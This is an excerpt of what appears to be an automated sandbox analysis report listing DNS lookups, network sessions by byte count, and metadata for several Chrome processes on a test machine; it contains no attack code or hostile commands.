Mar 10, 2025 13:57:38.551666021 CET | 1.1.1.1 | 192.168.2.6 | 0xb2e8 | No error (0) | 142.251.143.35 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:39.577783108 CET | 1.1.1.1 | 192.168.2.6 | 0x1255 | No error (0) | 142.250.185.131 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:41.610775948 CET | 1.1.1.1 | 192.168.2.6 | 0x5773 | No error (0) | 142.251.143.35 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:42.624577045 CET | 1.1.1.1 | 192.168.2.6 | 0x5773 | No error (0) | 142.251.143.35 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:43.640415907 CET | 1.1.1.1 | 192.168.2.6 | 0x5773 | No error (0) | 142.251.143.35 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:45.640439987 CET | 1.1.1.1 | 192.168.2.6 | 0x5773 | No error (0) | 142.251.143.35 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:49.656246901 CET | 1.1.1.1 | 192.168.2.6 | 0x5773 | No error (0) | 142.251.143.35 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:54.551692963 CET | 1.1.1.1 | 192.168.2.6 | 0x3f50 | No error (0) | 172.217.19.99 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:55.563374996 CET | 1.1.1.1 | 192.168.2.6 | 0x1926 | No error (0) | 216.58.221.195 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:57.594692945 CET | 1.1.1.1 | 192.168.2.6 | 0xd9ce | No error (0) | 209.85.145.94 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:58.612154961 CET | 1.1.1.1 | 192.168.2.6 | 0xd9ce | No error (0) | 209.85.145.94 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:59.624851942 CET | 1.1.1.1 | 192.168.2.6 | 0xd9ce | No error (0) | 209.85.145.94 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:01.640480995 CET | 1.1.1.1 | 192.168.2.6 | 0xd9ce | No error (0) | 209.85.145.94 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:05.640793085 CET | 1.1.1.1 | 192.168.2.6 | 0xd9ce | No error (0) | 209.85.145.94 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:10.551248074 CET | 1.1.1.1 | 192.168.2.6 | 0x1b9c | No error (0) | 172.217.16.195 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:11.564604998 CET | 1.1.1.1 | 192.168.2.6 | 0xce74 | No error (0) | 172.217.16.195 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:13.594760895 CET | 1.1.1.1 | 192.168.2.6 | 0xc633 | No error (0) | 142.250.185.131 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:14.610045910 CET | 1.1.1.1 | 192.168.2.6 | 0xc633 | No error (0) | 142.250.185.131 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:15.625202894 CET | 1.1.1.1 | 192.168.2.6 | 0xc633 | No error (0) | 142.250.185.131 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:17.641254902 CET | 1.1.1.1 | 192.168.2.6 | 0xc633 | No error (0) | 142.250.185.131 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:21.656322956 CET | 1.1.1.1 | 192.168.2.6 | 0xc633 | No error (0) | 142.250.185.131 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:26.555965900 CET | 1.1.1.1 | 192.168.2.6 | 0xb399 | No error (0) | 216.239.32.116 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:27.578803062 CET | 1.1.1.1 | 192.168.2.6 | 0x62b4 | No error (0) | 216.239.32.116 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:29.609886885 CET | 1.1.1.1 | 192.168.2.6 | 0xe609 | No error (0) | 216.239.32.116 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:30.624733925 CET | 1.1.1.1 | 192.168.2.6 | 0xe609 | No error (0) | 216.239.32.116 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:31.640414000 CET | 1.1.1.1 | 192.168.2.6 | 0xe609 | No error (0) | 216.239.32.116 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:33.640404940 CET | 1.1.1.1 | 192.168.2.6 | 0xe609 | No error (0) | 216.239.32.116 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:37.640717983 CET | 1.1.1.1 | 192.168.2.6 | 0xe609 | No error (0) | 216.239.32.116 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:38.551018953 CET | 1.1.1.1 | 192.168.2.6 | 0xb2a3 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:38.551018953 CET | 1.1.1.1 | 192.168.2.6 | 0xb2a3 | No error (0) | 216.58.206.67 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:38.552787066 CET | 1.1.1.1 | 192.168.2.6 | 0x5b1b | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:39.562696934 CET | 1.1.1.1 | 192.168.2.6 | 0x92ea | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:39.562696934 CET | 1.1.1.1 | 192.168.2.6 | 0x92ea | No error (0) | 142.251.143.67 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:39.564611912 CET | 1.1.1.1 | 192.168.2.6 | 0x6071 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:41.594399929 CET | 1.1.1.1 | 192.168.2.6 | 0x63ef | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:41.594399929 CET | 1.1.1.1 | 192.168.2.6 | 0x63ef | No error (0) | 142.251.143.67 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:43.082392931 CET | 1.1.1.1 | 192.168.2.6 | 0x1 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:58:43.082392931 CET | 1.1.1.1 | 192.168.2.6 | 0x1 | No error (0) | 142.251.116.94 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port |
---|---|---|---|---|
0 | 192.168.2.6 | 49725 | 172.217.18.3 | 80 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Mar 10, 2025 13:56:26.239062071 CET | 202 | OUT | |
Mar 10, 2025 13:56:26.879218102 CET | 223 | IN | |
Mar 10, 2025 13:56:26.885345936 CET | 200 | OUT | |
Mar 10, 2025 13:56:27.070044994 CET | 223 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.6 | 49694 | 46.31.79.76 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:15 UTC | 626 | OUT | |
2025-03-10 12:56:16 UTC | 479 | IN | |
2025-03-10 12:56:16 UTC | 889 | IN | |
2025-03-10 12:56:16 UTC | 14994 | IN | |
2025-03-10 12:56:16 UTC | 16384 | IN | |
2025-03-10 12:56:16 UTC | 16384 | IN | |
2025-03-10 12:56:16 UTC | 16384 | IN | |
2025-03-10 12:56:16 UTC | 16384 | IN | |
2025-03-10 12:56:16 UTC | 10676 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.6 | 49708 | 151.101.194.137 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:18 UTC | 609 | OUT | |
2025-03-10 12:56:19 UTC | 612 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN | |
2025-03-10 12:56:19 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.6 | 49707 | 104.17.25.14 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:18 UTC | 634 | OUT | |
2025-03-10 12:56:19 UTC | 961 | IN | |
2025-03-10 12:56:19 UTC | 408 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN | |
2025-03-10 12:56:19 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.6 | 49702 | 62.153.158.211 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:18 UTC | 612 | OUT | |
2025-03-10 12:56:19 UTC | 394 | IN | |
2025-03-10 12:56:19 UTC | 46 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.6 | 49703 | 62.153.158.211 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:19 UTC | 630 | OUT | |
2025-03-10 12:56:19 UTC | 396 | IN | |
2025-03-10 12:56:19 UTC | 3717 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.6 | 49704 | 62.153.158.211 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:19 UTC | 617 | OUT | |
2025-03-10 12:56:19 UTC | 396 | IN | |
2025-03-10 12:56:19 UTC | 7769 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.6 | 49705 | 80.146.236.47 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:19 UTC | 583 | OUT | |
2025-03-10 12:56:20 UTC | 247 | IN | |
2025-03-10 12:56:20 UTC | 3335 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.6 | 49706 | 80.146.236.47 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:19 UTC | 599 | OUT | |
2025-03-10 12:56:20 UTC | 247 | IN | |
2025-03-10 12:56:20 UTC | 3335 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.6 | 49713 | 62.153.158.211 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:21 UTC | 411 | OUT | |
2025-03-10 12:56:22 UTC | 394 | IN | |
2025-03-10 12:56:22 UTC | 46 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.6 | 49715 | 62.153.158.211 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:21 UTC | 429 | OUT | |
2025-03-10 12:56:22 UTC | 396 | IN | |
2025-03-10 12:56:22 UTC | 3717 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.6 | 49714 | 62.153.158.211 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:21 UTC | 416 | OUT | |
2025-03-10 12:56:22 UTC | 396 | IN | |
2025-03-10 12:56:22 UTC | 7769 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.6 | 49717 | 80.146.236.47 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:56:22 UTC | 625 | OUT | |
2025-03-10 12:56:23 UTC | 247 | IN | |
2025-03-10 12:56:23 UTC | 3335 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.6 | 52433 | 142.251.116.94 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:58:44 UTC | 363 | OUT | |
2025-03-10 12:58:44 UTC | 314 | OUT | |
2025-03-10 12:58:45 UTC | 806 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.6 | 52432 | 142.251.116.94 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:58:44 UTC | 363 | OUT | |
2025-03-10 12:58:44 UTC | 881 | OUT | |
2025-03-10 12:58:45 UTC | 806 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.6 | 52434 | 142.251.116.94 | 443 | 5328 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-10 12:58:56 UTC | 364 | OUT | |
2025-03-10 12:58:56 UTC | 1048 | OUT | |
2025-03-10 12:58:56 UTC | 806 | IN |
Click to jump to process
Click to jump to process
Click to jump to process
Target ID: | 1 |
Start time: | 08:56:04 |
Start date: | 10/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Target ID: | 4 |
Start time: | 08:56:10 |
Start date: | 10/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Target ID: | 17 |
Start time: | 08:59:10 |
Start date: | 10/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |